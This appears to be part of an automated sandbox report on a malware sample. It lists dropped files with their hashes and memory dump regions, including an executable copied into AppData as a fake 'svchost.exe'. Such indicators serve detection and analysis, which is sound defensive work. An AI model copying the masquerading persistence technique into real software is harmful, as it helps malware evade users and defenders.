bf25937b534e738f02e5ec01592dd9a72d79e67bc32f3a5e157a0608f5bbd117

SHA512
651e85acf56ec7bffdc10941ba3bcebea5aede44d479e4db5d61160de2b975c484499a95564adaf90f350d6a1bf3aa97774019f1464045114cbb97806fc76c2f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE

MD5
a2981517afbb3ebe48d2168b07274f47

SHA1
78e0fa382ca97436ec5c43209a2e391b41d356ab

SHA256
f5ef795d1577213ce930034afc93387232cc95dfe53db40db0ed65fbb44bcfae

SHA512
4e939a2270036ebf0eaec96ba231eb38cb4e2389064a30e5f3b9e5e5581d363ab934431e69978e015f25f3352d17e3b3242d02357aa034838a94912fa8d6ba15

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5
0465994d32988b4ff5811340c4905188

SHA1
7b4043cbd9509bc78b08863ad22b720632686785

SHA256
b33b95c79ca7fc2da4e43282f29ec14db42bdafd53c8888de793cea52caa20bb

SHA512
04654263a6391c84e0fd230a992dbd107f905599a066d124055591ce19a9d74b61627bb9d4dc9df89f396b12f795b649f0331e4aad39304a5ad0e0bccc36ad43

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB

MD5
38707060aa653b4de91172285fbcad3b

SHA1
f9aebdece980fd4efe2ffe196b2970b4376ef6ad

SHA256
94d739c3e32e375275cdd7b810f6ea2baba0785472578cf8149003450542a9bd

SHA512
25abb6e4bb303bcf2fbcd36d6e1691d1c09a8df0e8590f3c331a6103925f58c85eac8e341b5090a30d8c4650f4e39a18b1ed9f023c37b524bcf6eaf7e950c6e3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE

MD5
1b5b899dcf7ad220aaa7a8298b4c417d

SHA1
f1aa88c4d23a67fed98b258c12c4706b2c20265e

SHA256
5c6deafbf16adfbeab9a3193cd0269e073e57fdddb5549ff72ae455266c0981f

SHA512
9c4fd9e6e8cdf34b398af2322da17f3334111171a760ffbf9fd51962c80a0cab04a01bc553ddc5689b803aadf58fdfde9237a68878e8055b349a7c3853f2e850

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5
ead5fbd9779ab136d037f684e1b95df0

SHA1
04129e6b8fc961ca5660eeb2d9b49a78fe0ea2d1

SHA256
6f5419e415287ec72314175ca705666ef4919883d137c383a9d658b26e55c156

SHA512
0db04fac158ec5c6d1923fe84c43856653b2312e90e44b15fd48126594cd5b891b7b6b54549f46f81235316d7fd287526fe5aff35e5a96cfe796e6e20cd4bbca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DRMDU4BX\9N444H22.htm

MD5
b1cd7c031debba3a5c77b39b6791c1a7

SHA1
e5d91e14e9c685b06f00e550d9e189deb2075f76

SHA256
57ba053f075e0b80f747f3102ed985687c16a8754d109e7c4d33633269a36aaa

SHA512
d2bbefdc1effb52a38964c4cec5990a5a226248eca36f99e446c0c5704436f666bf1cb514e73b8991411d497d3325ecc646cbd5065c364e92ab6b9c5f1ad4a72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZIIA2USJ\9DGVTZJK.htm

MD5
8615e70875c2cc0b9db16027b9adf11d

SHA1
4ed62cf405311c0ff562a3c59334a15ddc4f1bf9

SHA256
da96949ba6b0567343f144486505c8c8fa1d892fd88c9cbc3ef3d751a570724d

SHA512
cd9dfc88dc2af9438b7d6b618d1b62029b3bdf739fc4daa5b37397afd12c4528561b3bf2fc3f3f2adf3fd1f582d5524332441fd30248fcd078e41aa91e17cb73

Download Submit
C:\Users\Admin\AppData\Local\Temp\JySplzhR.exe

MD5
dcef208fcdac3345c6899a478d16980f

SHA1
fd127c6ecaee57972b7acc3b8e4a2d3b25f928e0

SHA256
824a76c39895bc3ad4f5dfc27fc3ac80d26514118c4669505a1f0cfdc8fdbcdc

SHA512
28e403a6d66895a2461828f49acb2862602e6be94405657bee0aec5d35d86dd83713c4cd1f33d28b94fed6546633683f9ffa693d37dc94bc862f6584833f9fba

Download Submit
C:\Users\Admin\AppData\Local\Temp\JySplzhR.exe

MD5
dcef208fcdac3345c6899a478d16980f

SHA1
fd127c6ecaee57972b7acc3b8e4a2d3b25f928e0

SHA256
824a76c39895bc3ad4f5dfc27fc3ac80d26514118c4669505a1f0cfdc8fdbcdc

SHA512
28e403a6d66895a2461828f49acb2862602e6be94405657bee0aec5d35d86dd83713c4cd1f33d28b94fed6546633683f9ffa693d37dc94bc862f6584833f9fba

Download Submit
C:\Users\Admin\AppData\Local\Temp\~temp001.bat

MD5
ef572e2c7b1bbd57654b36e8dcfdc37a

SHA1
b84c4db6d0dfd415c289d0c8ae099aea4001e3b7

SHA256
e6e609db3f387f42bfd16dd9e5695ddc2b73d86ae12baf4f0dfc4edda4a96a64

SHA512
b8c014b242e8e8f42da37b75fe96c52cd25ebd366d0b5103bcba5ac041806d13142a62351edecdee583d494d2a120f9b330f6229b1b5fe820e1c7d98981089e9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe

MD5
dcef208fcdac3345c6899a478d16980f

SHA1
fd127c6ecaee57972b7acc3b8e4a2d3b25f928e0

SHA256
824a76c39895bc3ad4f5dfc27fc3ac80d26514118c4669505a1f0cfdc8fdbcdc

SHA512
28e403a6d66895a2461828f49acb2862602e6be94405657bee0aec5d35d86dd83713c4cd1f33d28b94fed6546633683f9ffa693d37dc94bc862f6584833f9fba

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe

MD5
dcef208fcdac3345c6899a478d16980f

SHA1
fd127c6ecaee57972b7acc3b8e4a2d3b25f928e0

SHA256
824a76c39895bc3ad4f5dfc27fc3ac80d26514118c4669505a1f0cfdc8fdbcdc

SHA512
28e403a6d66895a2461828f49acb2862602e6be94405657bee0aec5d35d86dd83713c4cd1f33d28b94fed6546633683f9ffa693d37dc94bc862f6584833f9fba

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe

MD5
dcef208fcdac3345c6899a478d16980f

SHA1
fd127c6ecaee57972b7acc3b8e4a2d3b25f928e0

SHA256
824a76c39895bc3ad4f5dfc27fc3ac80d26514118c4669505a1f0cfdc8fdbcdc

SHA512
28e403a6d66895a2461828f49acb2862602e6be94405657bee0aec5d35d86dd83713c4cd1f33d28b94fed6546633683f9ffa693d37dc94bc862f6584833f9fba

Download Submit
memory/516-164-0x0000000000000000-mapping.dmp

Download
memory/752-161-0x0000000001020000-0x0000000001021000-memory.dmp

Filesize
4KB

Download
memory/752-151-0x0000000000000000-mapping.dmp

Download
memory/908-166-0x0000000000000000-mapping.dmp

Download
memory/1088-168-0x0000000000000000-mapping.dmp

Download
memory/1088-174-0x0000000000E00000-0x0000000000F45000-memory.dmp

Filesize
1.3MB

Download
memory/1864-162-0x0000000000000000-mapping.dmp

Download
memory/1916-175-0x0000000000000000-mapping.dmp

Download
memory/2116-148-0x0000000000000000-mapping.dmp

Download
memory/2116-154-0x0000000000C00000-0x0000000000D45000-memory.dmp

Filesize
1.3MB

Download
memory/2132-173-0x0000000000000000-mapping.dmp

Download
memory/2208-163-0x0000000000000000-mapping.dmp

Download
memory/2288-167-0x0000000000000000-mapping.dmp

Download
memory/2532-171-0x0000000000000000-mapping.dmp

Download
memory/3356-165-0x0000000000000000-mapping.dmp

Download
memory/3460-133-0x000001E26B216000-0x000001E26B218000-memory.dmp

Filesize
8KB

Download
memory/3460-127-0x000001E26B210000-0x000001E26B212000-memory.dmp

Filesize
8KB

Download
memory/3460-126-0x000001E26BCB0000-0x000001E26BCB1000-memory.dmp

Filesize
4KB

Download
memory/3460-121-0x000001E26B130000-0x000001E26B131000-memory.dmp

Filesize
4KB

Download
memory/3460-115-0x0000000000000000-mapping.dmp

Download
memory/3460-128-0x000001E26B213000-0x000001E26B215000-memory.dmp

Filesize
8KB

Download
memory/3504-172-0x0000000000000000-mapping.dmp

Download
memory/3948-114-0x0000000000000000-mapping.dmp

Download
memory/3996-142-0x0000000000000000-mapping.dmp

Download
memory/3996-146-0x0000000000B70000-0x0000000000CB5000-memory.dmp

Filesize
1.3MB

Download
memory/3996-147-0x0000000000400000-0x0000000000557000-memory.dmp

Filesize
1.3MB

Download